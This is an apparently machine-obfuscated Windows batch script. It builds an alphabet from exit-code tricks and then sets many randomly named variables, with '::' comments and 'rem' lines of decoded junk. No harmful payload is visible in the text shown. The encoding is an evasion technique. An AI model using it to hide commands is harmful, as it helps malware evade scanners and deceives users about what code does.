&cls
@echo off
set x=set
%x% s= 
%x%%s%zz==
%x%%s%p%zz%/
%x%%s%ma%zz%a
%x%%s%gm%zz%c
%x%%s%qf%zz%m
%x%%s%h%zz%d
%x%%s%ax%zz%e
%x%%s%ds%zz%x
%x%%s%rb%zz%i
%x%%s%cu%zz%t
%x%%s%qd%zz% 
%x%%s%%p%%ma%%s%z%zz%8639305 %% 8639208
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%z%
%x%%s%wp%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ab%zz%3403246 %% 3403148
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ab%
%x%%s%v%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%cy%zz%5276898 %% 5276799
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%cy%
%x%%s%e%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%eu%zz%5631300 %% 5631200
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%eu%
%x%%s%c%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%l%zz%3697206 %% 3697105
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%l%
%x%%s%eg%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ny%zz%8795664 %% 8795562
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ny%
%x%%s%o%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%bm%zz%5116731 %% 5116628
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%bm%
%x%%s%qg%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%mj%zz%7110480 %% 7110376
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%mj%
%x%%s%g%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%sx%zz%1639575 %% 1639470
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%sx%
%x%%s%mc%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%b%zz%6236510 %% 6236404
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%b%
%x%%s%ta%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%rt%zz%7257703 %% 7257596
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%rt%
%x%%s%hv%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%jh%zz%2694924 %% 2694816
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%jh%
%x%%s%xc%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%r%zz%7655506 %% 7655397
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%r%
%x%%s%mf%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%n%zz%9371670 %% 9371560
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%n%
%x%%s%ul%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%w%zz%9562650 %% 9562539
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%w%
%x%%s%ec%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%f%zz%1413776 %% 1413664
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%f%
%x%%s%xk%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%y%zz%8615911 %% 8615798
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%y%
%x%%s%t%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%wz%zz%5862222 %% 5862108
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%wz%
%x%%s%u%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%it%zz%7884745 %% 7884630
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%it%
%x%%s%eb%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%vs%zz%10925460 %% 10925344
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%vs%
%x%%s%ji%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%d%zz%6874218 %% 6874101
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%d%
%x%%s%ba%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%om%zz%7008138 %% 7008020
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%om%
%x%%s%nv%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ir%zz%2934421 %% 2934302
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ir%
%x%%s%dc%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%qi%zz%7984320 %% 7984200
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%qi%
%x%%s%qb%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ag%zz%5195135 %% 5195014
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ag%
%x%%s%wa%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%nw%zz%5556124 %% 5556002
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%nw%
%x%%s%cr%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%le%zz%1716650 %% 1716585
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%le%
%x%%s%j%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%zl%zz%4928484 %% 4928418
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%zl%
%x%%s%sg%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%hc%zz%2844083 %% 2844016
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%hc%
%x%%s%yi%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ri%zz%1691636 %% 1691568
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ri%
%x%%s%xm%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%a%zz%5708025 %% 5707956
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%a%
%x%%s%yk%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%q%zz%4043550 %% 4043480
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%q%
%x%%s%m%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%xz%zz%1378110 %% 1378039
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%xz%
%x%%s%mk%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%de%zz%2757888 %% 2757816
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%de%
%x%%s%dw%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%zc%zz%6634386 %% 6634313
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%zc%
%x%%s%lf%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%lp%zz%2432824 %% 2432750
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%lp%
%x%%s%fm%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ev%zz%2596725 %% 2596650
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ev%
%x%%s%sz%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%cj%zz%1437768 %% 1437692
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%cj%
%x%%s%et%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ht%zz%7553007 %% 7552930
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ht%
%x%%s%sr%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%aj%zz%3620604 %% 3620526
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%aj%
%x%%s%xu%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%sa%zz%7727306 %% 7727227
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%sa%
%x%%s%ki%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%zj%zz%7481760 %% 7481680
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%zj%
%x%%s%cw%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%xs%zz%3158838 %% 3158757
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%xs%
%x%%s%gt%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ko%zz%5605274 %% 5605192
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ko%
%x%%s%yq%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%vh%zz%4564502 %% 4564419
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%vh%
%x%%s%fu%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%wy%zz%2213820 %% 2213736
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%wy%
%x%%s%zw%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%na%zz%5707325 %% 5707240
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%na%
%x%%s%da%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ap%zz%2523756 %% 2523670
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ap%
%x%%s%vm%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%i%zz%8245425 %% 8245338
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%i%
%x%%s%k%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%zd%zz%3000888 %% 3000800
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%zd%
%x%%s%oq%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%wk%zz%8050673 %% 8050584
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%wk%
%x%%s%qk%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%sy%zz%3797730 %% 3797640
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%sy%
%x%%s%cm%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%jm%zz%911376 %% 911328
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%jm%
%x%%s%pz%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%es%zz%1590246 %% 1590197
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%es%
%x%%s%zp%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%lv%zz%2220300 %% 2220250
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%lv%
%x%%s%po%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%sb%zz%3053013 %% 3052962
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%sb%
%x%%s%rs%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%wd%zz%4105660 %% 4105608
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%wd%
%x%%s%db%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%mp%zz%4509823 %% 4509770
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%mp%
%x%%s%ae%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%lc%zz%843588 %% 843534
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%lc%
%x%%s%gh%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%jk%zz%3816175 %% 3816120
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%jk%
%x%%s%ce%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%hw%zz%3728368 %% 3728312
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%hw%
%x%%s%pi%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%vc%zz%1980465 %% 1980408
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%vc%
%x%%s%wi%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%zn%zz%4509426 %% 4509303
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%zn%
%x%%s%ui%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%as%zz%8521750 %% 8521625
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%as%
%x%%s%dt%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%uf%zz%1830465 %% 1830402
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%uf%
%x%%s%qm%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%wg%zz%5234674 %% 5234616
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%wg%
%x%%s%qu%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%kx%zz%4010050 %% 4010004
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%kx%
%x%%s%lq%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ne%zz%2767448 %% 2767387
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ne%
%x%%s%pv%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%hm%zz%4223824 %% 4223780
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%hm%
%x%%s%ef%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%ee%zz%4891835 %% 4891740
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%ee%
%x%%s%bl%zz%%=exitcodeAscii%
%x%%s%%p%%ma%%s%am%zz%981990 %% 981945
%gm%%qf%%h%%qd%%p%%gm%%qd%%ax%%ds%%rb%%cu%%qd%%am%
%x%%s%oi%zz%%=exitcodeAscii%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ds%%dc%%u%%ma%%g%%u%%gm%%v%%dc%%gm%%qg%%gm%%ba%%ec%%hv%%cu%%u%%ax%%xk%%ul%%ds%%o%%ax%%nv%%ax%%ds%%g%%wa%%h%%qf%%ds%%gm%%ec%%ul%%eb%%rb%%ds%%qf%%wa%%wa%%t%%rb%%qg%%u%%pv%%rb%%cr%%nv%%cr%%o%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%u%%h%%qf%%wa%%qf%%ta%%rb%%xc%%xc%%wa%%v%%u%%rb%%dc%%wa%%xc%%ax%%g%%dc%%gm%%wa%%ma%%wa%%gm%%ta%%ta%%ec%%o%%h%%wa%%ma%%dc%%gm%%wa%%rb%%qg%%o%%v%%ax%%eb%%eb%%ta%%ax%%h%%gm%%h%%ma%%g%%rb%%eb%%t%%ec%%xk%%ta%%ax%%h%%pv%%dc%%wa%%ds%%ma%%nv%%v%%ds%%ds%%v%%t%%ax%%cu%%u%%t%%rb%%o%%ba%%qf%%qf%%cr%%dc%%dc%%g%%ta%%t%%qf%
%eb%%ax%%cu%%qd%%wa%%xc%%ec%%xk%%xc%%o%%ul%%hv%%o%%ds%%xk%%gm%%ul%%rb%%xc%%nv%%ec%%t%%ba%%wa%%xk%%u%%ta%%g%%nv%%v%%u%%t%%t%%qg%%ba%%nv%%ma%%xc%%dc%%o%%qf%%eb%%g%%ma%%v%%t%%rb%%ec%%ba%%qg%%t%%t%%qg%%ds%%cu%%u%%qg%%wa%%ul%%eb%%eb%%eb%%ul%%dc%%g%%wa%%dc%%eb%%ba%%ec%%wa%%pv%%ds%%xc%%dc%%xk%%g%%xk%%h%%h%%gm%%xc%%g%%dc%%wa%%xk%%ma%%h%%hv%%dc%%ec%%dc%%ec%%xc%%dc%%ma%%gm%%ax%%cu%%o%%nv%%ul%%cu%%cr%%v%%xk%%gm%%ax%%ul%%cr%%gm%%xk%%cr%%hv%%nv%%xk%%dc%%t%%eb%%u%%eb%%dc%%ec%%gm%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%h%%hv%%xk%%xk%%cr%%ba%%t%%h%%g%%v%%nv%%t%%hv%%ax%%ec%%qf%%h%%rb%%eb%%dc%%v%%cu%%h%%qg%%hv%%ma%%hv%%ba%%ma%%eb%%v%%u%%t%%hv%%xk%%ta%%u%%ax%%v%%ds%%ds%%ma%%o%%ec%%t%%ec%%h%%g%%ta%%gm%%v%%o%%dc%%u%%h%%g%%ta%%ec%%o%%xc%%ba%%qf%%pv%%eb%%dc%%rb%%cu%%cr%%t%%qg%%ba%%cr%%qg%%ba%%wa%%nv%%hv%%ax%%qf%%gm%%u%%ta%%g%%cr%%rb%%ax%%cu%%ul%%g%%qg%%ax%%ma%%ax%%xc%%xk%%ds%%v%%ds%%ax%%xc%%ul%%qg%%xc%%hv%%rb%%u%%ec%%gm%%ds%%eb%
%eb%%ax%%cu%%qd%%ma%%u%%wa%%ec%%ec%%h%%xc%%gm%%u%%o%%cu%%hv%%rb%%g%%wa%%dc%%ds%%pv%%gm%%cr%%nv%%ta%%xc%%u%%ta%%wa%%hv%%rb%%ul%%ma%%dc%%cu%%dc%%ax%%wa%%cr%%wa%%rb%%wa%%ds%%cu%%hv%%ma%%gm%%nv%%cu%%v%%ec%%rb%%dc%%o%%gm%%cr%%eb%%nv%%wa%%v%%v%%u%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%qg%%ba%%cu%%ta%%rb%%wa%%o%%eb%%rb%%ta%%eb%%ds%%v%%h%%t%%ax%%ul%%ec%%u%%ax%%ul%%xk%%ec%%ds%%nv%%ba%%cr%%rb%%ec%%xc%%qf%%xk%%cr%%ul%%t%%o%%pv%%xk%%v%%wa%%h%%qf%%ul%%u%%qg%%v%%xc%%ta%%cu%%ta%%gm%%ul%%ma%%o%%dc%%u%%ba%%ds%%h%%wa%%cu%%gm%%hv%%qf%%cu%%eb%%hv%%xk%%ul%%ta%%ds%%ma%%dc%%cr%%qf%%g%%ba%
%eb%%ax%%cu%%qd%%cu%%ul%%g%%cu%%v%%t%%t%%ul%%ma%%dc%%hv%%ax%%xc%%ta%%gm%%eb%%ba%%ba%%eb%%hv%%ax%%qf%%ds%%xk%%wa%%dc%%ba%%cu%%xk%%dc%%g%%xk%%xc%%xc%%gm%%h%%qg%%ta%%dc%%qg%%dc%%qg%%eb%%ax%%ec%%nv%%o%%o%%pv%%dc%%ma%%cr%%ec%%qg%%rb%%cr%%xk%%ax%%eb%%rb%%o%%eb%%ba%%ds%%gm%%ec%%ec%%u%%xc%%qf%%wa%%hv%%xk%%eb%%ds%%gm%%h%%v%%ba%%rb%%wa%%dc%%qg%%qg%%t%%u%%gm%%o%%xc%%nv%%cr%%ds%%eb%%dc%%nv%%cr%%cu%%rb%%t%%xc%%xk%%ma%%ta%%o%%ba%%xc%%gm%%t%%rb%%ta%%ma%
%eb%%ax%%cu%%qd%%gm%%v%%ma%%cu%%wa%%h%%qf%%u%%v%%hv%%qg%%t%%ta%%cu%%qf%%qg%%gm%%h%%xk%%wa%%wa%%cu%%ds%%t%%v%%ta%%ds%%ta%%pv%%ax%%eb%%qg%%ba%%g%%cu%%cu%%ec%%v%%u%%cu%%t%%ta%%gm%%o%%ax%%eb%%wa%%dc%%qf%%xc%%xc%%v%%nv%%wa%%cu%%ul%%xk%%gm%%t%%wa%%qf%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%gm%%ul%%ba%%o%%eb%%hv%%cu%%ma%%v%%eb%%xk%%xk%%t%%wa%%ba%%eb%%h%%dc%%xk%%ta%%u%%g%%ma%%g%%o%%dc%%wa%%eb%%dc%%t%%ax%%dc%%cu%%ec%%t%%g%%o%%rb%%ul%%ds%%g%%cr%%ma%%h%%g%%hv%%xc%%hv%%o%%ul%%t%%g%%gm%%qf%%u%%xk%%hv%%qf%%nv%%qg%%ba%%o%%ba%%qg%%qg%%t%%pv%%cu%%g%%cr%%qg%%t%%ec%%ec%%o%%ul%%rb%%ba%%xk%%xc%%wa%%cr%%g%%ta%%nv%%rb%%ba%%ta%%h%%xc%%ec%%wa%%cr%%dc%%qf%%gm%%ec%%nv%%h%%ta%%o%%rb%%rb%%v%%ax%
%eb%%ax%%cu%%qd%%rb%%cu%%u%%u%%gm%%ec%%ta%%v%%hv%%ec%%ec%%qg%%cu%%nv%%ma%%v%%nv%%ba%%hv%%t%%o%%rb%%ma%%h%%eb%%ba%%nv%%u%%t%%eb%%cu%%ax%%ul%%eb%%hv%%ds%%cu%%gm%%rb%%ax%%gm%%ta%%v%%wa%%t%%ma%%cr%%g%%ta%%eb%%gm%%gm%%ec%%h%%t%%h%%ul%%wa%%hv%%cu%%v%%g%%h%%rb%%ax%%ds%%pv%%t%%nv%%hv%%hv%%ds%%eb%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%dc%%h%%ec%%dc%%ba%%ta%%xc%%ec%%g%%hv%%nv%%g%%xc%%eb%%dc%%nv%%cr%%nv%%ec%%g%%qf%%o%%gm%%cu%%gm%%eb%%u%%nv%%dc%%cr%%wa%%gm%%ul%%qg%%t%%v%%ma%%u%%ba%%hv%%v%%h%%qf%%xc%%eb%%ta%%h%%ec%%ta%%qf%%pv%%qg%%hv%%xk%%xc%%cr%%ds%%h%%h%%v%%qg%%v%%v%%h%%xc%%gm%%h%%o%%ba%%v%%cu%%ta%%ta%%ta%%ta%%xk%%hv%%ax%%ta%%ds%%xc%%h%%ba%%ec%%ec%%u%%ax%%nv%%o%%hv%%t%%ul%%ul%%ax%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ax%%o%%gm%%ta%%o%%qf%%ba%%ba%%nv%%u%%t%%eb%%ul%%eb%%u%%ba%%ax%%g%%ds%%cu%%u%%o%%ds%%hv%%rb%%v%%eb%%qf%%ta%%qg%%qf%%cu%%ax%%ba%%ba%%xk%%hv%%ba%%o%%hv%%ul%%gm%%cu%%gm%%ma%%ta%%xc%%o%%t%%eb%%eb%%hv%%ma%%xk%%cr%%h%%cr%%t%%qg%%h%%ds%%xk%%pv%%v%%h%%ec%%gm%%g%%rb%%ax%%cr%%ta%%t%%ba%%xk%%ma%%ax%%ma%%ul%%ul%%ec%
%eb%%ax%%cu%%qd%%t%%g%%xk%%ta%%ec%%u%%xc%%h%%u%%wa%%qf%%dc%%ax%%qg%%cr%%ma%%dc%%gm%%eb%%cu%%ma%%v%%hv%%u%%u%%wa%%ds%%gm%%ul%%o%%xc%%g%%hv%%u%%ec%%xk%%eb%%ax%%rb%%o%%u%%cr%%ds%%dc%%dc%%ds%%h%%xk%%cr%%pv%%xk%%xc%%ec%%v%%eb%%o%%ec%%cr%%xk%%h%%v%%h%%hv%%cr%%ma%%h%%v%%eb%%gm%%t%%cr%%qf%%ba%%ul%%cr%%t%%ma%%dc%%qf%%ba%%rb%%hv%%qg%%o%%u%%nv%%nv%%wa%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%xc%%v%%cu%%cr%%ec%%ax%%ta%%wa%%dc%%ec%%ma%%ax%%nv%%eb%%h%%h%%ds%%xk%%ax%%ul%%ba%%ul%%u%%ma%%cu%%ba%%wa%%g%%xc%%xc%%cu%%nv%%gm%%ec%%rb%%ec%%hv%%g%%ec%%ta%%ul%%h%%cr%%t%%v%%ta%%xc%%wa%%t%%ta%%h%%dc%%ma%%gm%%ba%%ec%%cu%%dc%%wa%%nv%%xc%%gm%%ta%%hv%%ds%%pv%%ta%%xk%%wa%%xc%%wa%%ul%%xk%%h%%dc%%eb%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%hv%%h%%v%%ul%%xc%%gm%%ds%%nv%%ds%%ax%%qf%%rb%%ul%%ds%%cr%%o%%cu%%xc%%wa%%t%%ma%%ec%%gm%%ec%%dc%%hv%%ma%%hv%%dc%%ds%%o%%dc%%cu%%cu%%ma%%xc%%xc%%pv%%qg%%ds%%rb%%hv%%xk%%ds%%gm%%ma%%t%%u%%xc%%rb%%cu%%nv%%ta%%ba%%v%%eb%%wa%%eb%%qg%%dc%%cr%%ba%%ba%%v%%g%%ba%%g%%ax%%rb%%qg%%xk%%ax%%rb%%ta%%h%%ta%%ax%%qg%%cr%%eb%%h%%nv%%gm%%rb%%hv%%g%%qg%%ec%%v%%cr%%ta%%nv%%h%%g%%xc%%u%%qf%%o%%t%%xk%%ds%%u%%xc%%cr%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%hv%%o%%qf%%h%%g%%hv%%ul%%t%%ul%%ta%%eb%%hv%%rb%%o%%wa%%eb%%qf%%g%%u%%hv%%hv%%eb%%cr%%ma%%t%%ba%%h%%h%%t%%ta%%cu%%ba%%ma%%u%%ma%%t%%xc%%ma%%g%%g%%eb%%hv%%ec%%xc%%qf%%u%%h%%h%%qg%%eb%%hv%%hv%%eb%%wa%%gm%%u%%pv%%qg%%g%%o%%ma%%h%%rb%%gm%%ma%%ma%%cu%%wa%%ax%%u%%t%%xk%%ba%%ba%%cu%%eb%%qg%%g%%ma%%nv%%dc%%rb%%ec%%cu%%ba%%u%%xc%%xk%%xc%%xc%%h%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%v%%ma%%qf%%ds%%ul%%t%%o%%h%%ba%%o%%ul%%qg%%ma%%ba%%ax%%ax%%qg%%ma%%cu%%pv%%xk%%ta%%t%%cu%%g%%ta%%cr%%o%%o%%nv%%cu%%g%%ba%%g%%ba%%ta%%eb%%rb%%dc%%ul%%h%%cr%%ba%%ba%%ta%%u%%wa%%dc%%xk%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%wa%%ta%%gm%%g%%g%%o%%ds%%gm%%hv%%xk%%cu%%ax%%nv%%ax%%u%%xk%%xk%%qf%%g%%cr%%cu%%hv%%rb%%t%%g%%g%%xk%%ax%%g%%t%%ta%%qg%%nv%%cr%%xk%%qg%%xc%%ec%%cr%%gm%%ta%%cr%%ds%%ds%%gm%%cr%%qf%%hv%%g%%u%%dc%%dc%%pv%%wa%%nv%%u%%gm%%xc%%gm%%t%%xc%%o%%ul%%o%%xk%%ds%%qf%%gm%%dc%%xk%%t%%xk%%ta%%eb%%h%%wa%%v%%o%%nv%%qg%%qg%%ds%%ma%%gm%%eb%%o%%ma%%gm%%nv%%ta%%xk%%gm%%xc%%rb%%ba%%dc%%xk%%cr%%v%%cr%%u%%ec%%ax%%ul%%t%%ma%%dc%%o%%ds%%u%%gm%
%u%%ax%%qf%%qd%%eb%%ax%%cu%%qd%%o%%cr%%g%%ul%%ba%%eb%%ta%%ax%%hv%%xc%%ax%%wa%%wa%%ta%%v%%xk%%cr%%xc%%qf%%wa%%qg%%dc%%ta%%nv%%cu%%t%%dc%%nv%%cu%%qg%%t%%dc%%h%%ta%%eb%%eb%%t%%xk%%ul%%gm%%ba%%t%%wa%%cu%%ul%%o%%rb%%ta%%v%%t%%u%%rb%%v%%wa%%g%%hv%%qf%%qf%%h%%g%%ds%%t%%pv%%ta%%eb%%t%%xk%%wa%%wa%%xc%%ta%%hv%%ta%%qf%%dc%%ds%%ds%%ul%%hv%%t%%nv%%nv%%ul%%ax%%qf%%wa%%ds%%dc%%cu%%qg%%xk%%ec%%v%%rb%%xc%%ta%%v%%hv%%ds%%ba%%ec%%cr%%qg%%cu%%u%%t%%h%%ul%%wa%%h%%qg%%cu%%xc%%cu%%dc%%ec%
%qu%%qu%%qd%%eb%%ax%%cu%%qd%%ba%%u%%o%%u%%ec%%ax%%qg%%qf%%cu%%hv%%xk%%o%%t%%rb%%eb%%pv%%nv%%ax%%u%%o%%ul%%hv%%u%%v%%g%%gm%%qf%%rb%%ma%%ta%%ma%%ax%%cr%%g%%t%%v%
